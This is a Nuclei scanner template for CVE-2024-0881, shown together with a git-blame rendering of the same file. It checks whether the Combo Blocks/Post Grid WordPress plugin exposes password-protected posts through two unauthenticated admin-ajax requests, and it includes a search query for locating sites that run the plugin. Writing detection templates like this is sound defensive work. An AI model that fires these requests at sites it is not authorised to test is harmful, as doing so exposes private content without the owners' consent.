nuclei-templates/http/cves/2024/CVE-2024-0881.yaml

id: CVE-2024-0881

info:
  name: Combo Blocks < 2.2.76 - Password Protected Posts Access
  author: Kazgangap
  severity: medium
  description: |
    The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0881
    - https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    epss-score: 0.00043
    epss-percentile: 0.08256
  metadata:
    max-request: 1
    publicwww-query: "/wp-content/plugins/post-grid/"
  tags: cve,cve2023,wpscan,wordpress,wp-plugin,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"html"'
          - '"<div class='
        condition: and

      - type: status
        status:
          - 200
add cve-2024-0881 2024-05-01 14:27:37 +00:00			`id: CVE-2024-0881`

			`info:`
			`name: Combo Blocks < 2.2.76 - Password Protected Posts Access`
			`author: Kazgangap`
			`severity: medium`
			`description: \|`
			`The Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel WordPress plugin before 2.2.76 does not prevent password protected posts from being displayed in the result of some unauthenticated AJAX actions, allowing unauthenticated users to read such posts`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2024-0881`
			`- https://wpscan.com/vulnerability/e460e926-6e9b-4e9f-b908-ba5c9c7fb290/`
added metadata 2024-05-03 11:10:01 +00:00			`- https://github.com/fkie-cad/nvd-json-data-feeds`
add cve-2024-0881 2024-05-01 14:27:37 +00:00			`classification:`
			`epss-score: 0.00043`
added metadata 2024-05-03 11:10:01 +00:00			`epss-percentile: 0.08256`
			`metadata:`
			`max-request: 1`
			`publicwww-query: "/wp-content/plugins/post-grid/"`
			`tags: cve,cve2023,wpscan,wordpress,wp-plugin,unauth`
add cve-2024-0881 2024-05-01 14:27:37 +00:00
			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free"`
			`- "{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- '"html"'`
			`- '"<div class='`
added metadata 2024-05-03 11:10:01 +00:00			`condition: and`

			`- type: status`
			`status:`
			`- 200`